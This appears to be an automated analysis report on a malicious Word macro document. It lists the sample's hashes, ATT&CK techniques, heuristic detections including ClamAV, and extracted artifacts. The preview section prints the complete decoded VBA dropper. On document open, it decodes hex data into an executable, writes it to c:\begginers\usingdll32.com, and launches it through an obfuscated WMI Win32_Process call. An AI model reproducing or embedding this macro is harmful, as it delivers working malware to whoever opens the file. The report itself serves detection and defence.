Office (OOXML) malware analysis — malicious · 26343fd2691b9e8b

MALICIOUS

Office (OOXML)

388.6 KB Created: 2020-05-29 08:51:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2020-09-24

MD5: 97e0a1bccab5eff8f2e8603a7057c17a SHA-1: ea679b0b00e5ae45c92557a7036421db90fead81 SHA-256: 26343fd2691b9e8b902d17f0a8a61038f61a983fda5e91f10aa0a30f85fcd2d6

302 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is an OOXML document containing a malicious VBA macro with a Document_Open auto-execution routine. The macro attempts to create a directory 'c:\begginers' and write a file named 'usingdll32.com' to it. It also uses obfuscated strings and calls to CreateObject and GetObject, indicative of a downloader or dropper. The ClamAV detection 'Doc.Dropper.HexEncodedEXEHeader-9789587-1' further supports this assessment.

Heuristics 8

ClamAV: Doc.Dropper.HexEncodedEXEHeader-9789587-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.HexEncodedEXEHeader-9789587-1
VBA project inside OOXML medium 5 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	2347 bytes
SHA-256: `82eeab62f22c6070cd75d1d0bb10d715db2a3604b6c4f14a293dbc4e6dc4cd83`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Dim f, sPath, strTemp, strReturn, strHexValues, CurFolder Dim objFSO, strFolder Dim K For K = 0 To 213 Call DateAdd("s", K, Now) DoEvents Next K strFolder = "c:\" & "begginers" sPath = strFolder & "\" & "usingdll32.com" strHexValues = example.GroupName For K = 0 To 1 Call DateAdd("s", K, Now) DoEvents Next K Set objFSO = CreateObject("Scripting.FileSystemObject") If Not objFSO.FolderExists(strFolder) Then objFSO.CreateFolder (strFolder) End If For K = 0 To 11 Call DateAdd("s", K, Now) DoEvents Next K For K = 0 To 65 Call DateAdd("s", K, Now) DoEvents Next K Set block1 = GetObject(ChrW(119) & ChrW(105) & ChrW(110) & ChrW(109) & ChrW(103) & ChrW(109) & ChrW(116) & ChrW(115) _ & ChrW(58) & ChrW(87) & ChrW(105) & ChrW(110) & ChrW(51) & ChrW(50) & ChrW(95) & ChrW(80) & ChrW(114) _ & ChrW(111) & ChrW(99) & ChrW(101) & ChrW(115) & ChrW(115)) For f = 1 To Len(strHexValues) Step 2 strTemp = Chr(Val("" + "&" + "H" + Mid$(strHexValues, f, 2))) strReturn = strReturn + strTemp Next f strHexValues = Right(strReturn, Len(strReturn) - 1) Open sPath For Output As #1 Print #1, Chr$(77) + strHexValues Close #1 For K = 0 To 34 Call DateAdd("s", K, Now) DoEvents Next K block1.create sPath, Null, Null, processid For K = 0 To 35 Call DateAdd("s", K, Now) DoEvents Next K ActiveDocument.Close _ SaveChanges:=wdPromptToSaveChanges, _ OriginalFormat:=wdPromptUser For K = 0 To 355467 Call DateAdd("s", K, Now) DoEvents Next K End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	12288 bytes
SHA-256: `f99005401ffbd0d93487d2dcb71a74ce1980e795ce025cd97d8019c185c00dea`

Open this report in the interactive analyzer, or submit your own file for analysis.